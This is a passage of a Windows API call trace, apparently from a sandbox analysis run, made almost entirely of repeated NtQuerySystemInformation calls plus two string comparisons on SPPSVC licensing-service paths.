(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x38, ResultLength=0x0) [0207.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x38, ResultLength=0x0) [0207.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x28, ResultLength=0x0) [0207.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x28, ResultLength=0x0) [0207.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x38, ResultLength=0x0) [0207.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x38, ResultLength=0x0) [0207.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd20, Length=0x20, ResultLength=0x0) [0207.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcca0, Length=0x20, ResultLength=0x0) [0207.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcca0, Length=0x20, ResultLength=0x0) [0207.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcca0, Length=0x20, ResultLength=0x0) [0207.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x20, ResultLength=0x0) [0207.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x38, ResultLength=0x0) [0207.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x20, ResultLength=0x0) [0207.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0207.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0207.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0207.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x38, ResultLength=0x0) [0207.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x20, ResultLength=0x0) [0207.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0207.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0207.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0207.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x38, ResultLength=0x0) [0207.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x20, ResultLength=0x0) [0207.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0207.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0207.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd308, Length=0x50, ResultLength=0x0) [0207.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x38, ResultLength=0x0) [0207.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x28, ResultLength=0x0) [0207.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x28, ResultLength=0x0) [0207.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x28, ResultLength=0x0) [0207.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x28, ResultLength=0x0) [0207.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x28, ResultLength=0x0) [0207.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x38, ResultLength=0x0) [0207.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd150, Length=0x28, ResultLength=0x0) [0207.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd150, Length=0x28, ResultLength=0x0) [0207.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x38, ResultLength=0x0) [0207.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x20, ResultLength=0x0) [0207.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x20, ResultLength=0x0) [0207.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x20, ResultLength=0x0) [0207.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x20, ResultLength=0x0) [0207.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x38, ResultLength=0x0) [0207.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x20, ResultLength=0x0) [0207.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x20, ResultLength=0x0) [0207.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x20, ResultLength=0x0) [0207.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x50, ResultLength=0x0) [0207.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0e0, Length=0x38, ResultLength=0x0) [0207.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x28, ResultLength=0x0) [0207.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x28, ResultLength=0x0) [0207.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x28, ResultLength=0x0) [0207.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x28, ResultLength=0x0) [0207.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x28, ResultLength=0x0) [0207.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0e0, Length=0x38, ResultLength=0x0) [0207.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd000, Length=0x28, ResultLength=0x0) [0207.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd000, Length=0x28, ResultLength=0x0) [0207.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0e0, Length=0x38, ResultLength=0x0) [0207.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf60, Length=0x20, ResultLength=0x0) [0207.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0207.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0207.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0207.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0e0, Length=0x38, ResultLength=0x0) [0207.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf60, Length=0x20, ResultLength=0x0) [0207.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x20, ResultLength=0x0) [0207.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x20, ResultLength=0x0) [0207.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.194] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0207.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd198, Length=0x50, ResultLength=0x0) [0207.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0207.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0207.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0207.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0207.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf60, Length=0x28, ResultLength=0x0) [0207.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0207.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x28, ResultLength=0x0) [0207.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x28, ResultLength=0x0) [0207.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0207.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x20, ResultLength=0x0) [0207.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0207.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0207.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0207.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0207.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x20, ResultLength=0x0) [0207.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0207.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0207.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd520, Length=0x50, ResultLength=0x0) [0207.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4a0, Length=0x28, ResultLength=0x0) [0207.201] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0207.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd520, Length=0x50, ResultLength=0x0) [0207.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.202] NtQuerySystemInformation 